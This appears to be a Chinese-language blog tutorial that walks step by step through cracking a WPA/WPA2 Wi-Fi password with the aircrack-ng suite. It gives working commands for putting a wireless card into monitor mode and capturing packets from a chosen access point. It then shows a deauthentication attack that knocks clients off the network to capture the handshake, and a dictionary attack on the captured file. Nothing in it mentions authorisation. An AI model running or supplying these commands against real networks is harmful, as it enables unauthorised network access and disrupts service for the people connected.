设置监听模式
激活网卡
ifconfig wlan0 up
结束占用网络接口的进程
airmon-ng check kill
开启监听模式
airmon-ng start wlan0
查看网卡是否成功开启了监听模式
iwconfig
Mode状态为Monitor为开启成功,Managed为不成功。
捕获数据包
此处须填写监听模式的接口,一般为wlan0mon。
airodump-ng wlan0mon
按Ctrl+C可停止扫描。
airodump-ng -t WPA2 wlan0mon #仅捕获WPA2加密方式的数据包 airodump-ng --bssid 00:25:00:FF:94:73 wlan0mon #指定捕获BSSID的包 airodump-ng -N Tech-For-Test wlan0mon #指定捕获ESSID的包 airodump-ng -c 6 wlan0mon #捕获信道为6的包
保存捕获的数据包
airodump-ng -w packet wlan0mon #将捕获的数据包保存到名为packet的文件中
读取数据包
airodump-ng -r xxx.pcap #读取名为xxx.pcap的数据包
这里我们使用以下命令:
airodump-ng -c 11 -w AirCrk --bssid F0:DB:F8:0C:0B:28 wlan0mon
频道号 写入AirCrk文件
等待右上角出现WPA handshake关键字时说明成功获得到了包含WPA密码的4次握手数据报文,此时可使用aireplay注入。
若没有看到这个提示,可以增加Deauth的发送数量。
其他导致无法获取握手报文的原因(摘自Longas的《Linux-BT4黑客手册》):
1.可能该无线网卡对这些无线工具的支持性不好,比如很多笔记本自带的无线网卡支持性就不好。
2.无线接入点自身问题,有的AP在遭受攻击后会短时间内失去响应,需重启后等待片刻才能恢复正常工作状态。
注入数据包
目的是强制客户端重新连接,从而获取WPA/WPA2握手数据包。(需airodump-ng处于运行状态)
重新打开一个终端。
-0表示Deauth攻击模式 5表示发送次数
aireplay-ng -0 1 -a A4:2B:8C:7D:98:7D-c F0:DB:F8:0C:0B:28 wlan0mon #使用Deauth攻击模式 破解WPA/WPA2包。
BSSID mac地址 STATION mac地址
最后使用加载字典对cap数据包进行破解。
aircrack-ng -w dic.txt -b F0:DB:F8:0C:0B:28 log-01.cap
如果字典比较大,跑起来可能需要很久,这个过程是很考验RP的,破解成功后会出现下图界面:
作者:AirCrk
原文地址:http://www.cnblogs.com/AirCrk/articles/5652589.html